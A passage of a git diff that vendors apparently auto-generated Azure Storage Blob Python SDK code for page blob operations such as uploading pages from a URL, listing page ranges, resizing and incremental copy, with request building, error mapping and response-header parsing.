Optional["_models.CpkScopeInfo"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + sequence_number_access_conditions=None, # type: Optional["_models.SequenceNumberAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Upload Pages operation writes a range of pages to a page blob where the contents are read + from a URL. + + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param source_range: Bytes of source data in the specified range. The length of this range + should match the ContentLength header and x-ms-range/Range destination range header. + :type source_range: str + :param content_length: The length of the request. 
+ :type content_length: long + :param range: The range of bytes to which the source range would be written. The range should + be 512 aligned and range-end is required. + :type range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "update". Note that + overriding this default value may result in unsupported behavior. 
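+ 
+ A minimal usage sketch (assuming ``client`` is an already-constructed ``PageBlobOperations`` instance; the source URL and SAS token are illustrative)::
+ 
+ # Server-side copy of one 512-byte page from a source blob; source and
+ # destination ranges must be 512-byte aligned and of equal length.
+ client.upload_pages_from_url(
+ source_url="https://src.blob.core.windows.net/cont/blob?<sas>",
+ source_range="bytes=0-511",
+ content_length=512,
+ range="bytes=0-511",
+ )
+ 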
+ :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_upload_pages_from_url_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + source_url=source_url, + source_range=source_range, + content_length=content_length, + range=range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + 
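+ # The source_if_* conditions target the copy *source* blob and are sent as
+ # x-ms-source-if-* headers, independently of the destination if_* conditions
+ # above.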
source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.upload_pages_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload_pages_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_page_ranges( + self, + snapshot=None, # type: Optional[str] + timeout=None, # type: Optional[int] + range=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> "_models.PageList" + """The Get Page Ranges operation returns the list of valid page ranges for a page blob or snapshot + of a page blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. 
+ :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "pagelist". Note that overriding this default value may + result in unsupported behavior. 
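+ 
+ A minimal usage sketch (assuming ``client`` is an already-constructed ``PageBlobOperations`` instance; attribute names follow the generated ``PageList``/``PageRange`` models)::
+ 
+ # List the valid (non-cleared) page ranges in the first 1 MiB of the blob.
+ page_list = client.get_page_ranges(range="bytes=0-1048575")
+ for page_range in page_list.page_range:
+ print(page_range.start, page_range.end)
+ 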
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: PageList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.PageList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.PageList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "pagelist") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_page_ranges_request( + url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + timeout=timeout, + range=range, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + marker=marker, + maxresults=maxresults, + template_url=self.get_page_ranges.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('PageList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_page_ranges.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_page_ranges_diff( + self, + snapshot=None, # type: Optional[str] + timeout=None, # type: Optional[int] + prevsnapshot=None, # type: Optional[str] + prev_snapshot_url=None, # type: Optional[str] + range=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + 
lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> "_models.PageList" + """The Get Page Ranges Diff operation returns the list of valid page ranges for a page blob that + were changed between target blob and previous snapshot. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param prevsnapshot: Optional in version 2015-07-08 and newer. The prevsnapshot parameter is a + DateTime value that specifies that the response will contain only pages that were changed + between target blob and previous snapshot. Changed pages include both updated and cleared + pages. The target blob may be a snapshot, as long as the snapshot specified by prevsnapshot is + the older of the two. Note that incremental snapshots are currently supported only for blobs + created on or after January 1, 2016. Default value is None. + :type prevsnapshot: str + :param prev_snapshot_url: Optional. This header is only supported in service versions + 2019-04-19 and after and specifies the URL of a previous snapshot of the target blob. The + response will only contain pages that were changed between the target blob and its previous + snapshot. Default value is None. + :type prev_snapshot_url: str + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. 
Default value is "pagelist". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: PageList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.PageList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.PageList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "pagelist") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_page_ranges_diff_request( + url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + timeout=timeout, + prevsnapshot=prevsnapshot, + prev_snapshot_url=prev_snapshot_url, + range=range, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + marker=marker, + maxresults=maxresults, + template_url=self.get_page_ranges_diff.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('PageList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_page_ranges_diff.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def resize( # pylint: disable=inconsistent-return-statements + self, + blob_content_length, # type: int + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: 
Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """Resize the Blob. + + :param blob_content_length: This header specifies the maximum size for the page blob, up to 1 + TB. The page blob size must be aligned to a 512-byte boundary. + :type blob_content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_resize_request( + url=self._config.url, + comp=comp, + version=self._config.version, + blob_content_length=blob_content_length, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + 
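+ # The if_* arguments below become standard conditional headers
+ # (If-Modified-Since, If-Match, x-ms-if-tags, ...); when the blob's current
+ # state does not satisfy them the service rejects the resize, typically
+ # with 412 Precondition Failed.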
if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.resize.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + resize.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def update_sequence_number( # pylint: disable=inconsistent-return-statements + self, + sequence_number_action, # type: Union[str, "_models.SequenceNumberActionType"] + timeout=None, # type: Optional[int] + blob_sequence_number=0, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """Update the sequence number of the blob. + + :param sequence_number_action: Required if the x-ms-blob-sequence-number header is set for the + request. This property applies to page blobs only. This property indicates how the service + should modify the blob's sequence number. + :type sequence_number_action: str or ~azure.storage.blob.models.SequenceNumberActionType + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param blob_sequence_number: Set for page blobs only. The sequence number is a user-controlled + value that you can use to track requests. The value of the sequence number must be between 0 + and 2^63 - 1. Default value is 0. + :type blob_sequence_number: long + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. 
+ :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_update_sequence_number_request( + url=self._config.url, + comp=comp, + version=self._config.version, + sequence_number_action=sequence_number_action, + timeout=timeout, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_sequence_number=blob_sequence_number, + request_id_parameter=request_id_parameter, + template_url=self.update_sequence_number.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + update_sequence_number.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def copy_incremental( # pylint: disable=inconsistent-return-statements + self, + copy_source, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: 
Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Copy Incremental operation copies a snapshot of the source page blob to a destination page + blob. The snapshot is copied such that only the differential changes between the previously + copied snapshot are transferred to the destination. The copied snapshots are complete copies of + the original snapshot and can be read or copied from as usual. This API is supported since REST + version 2016-05-31. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "incrementalcopy". Note that overriding this default + value may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "incrementalcopy") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_copy_incremental_request( + url=self._config.url, + comp=comp, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.copy_incremental.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers 
= {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + copy_incremental.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_service_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_service_operations.py new file mode 100644 index 0000000..f2b2050 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_service_operations.py @@ -0,0 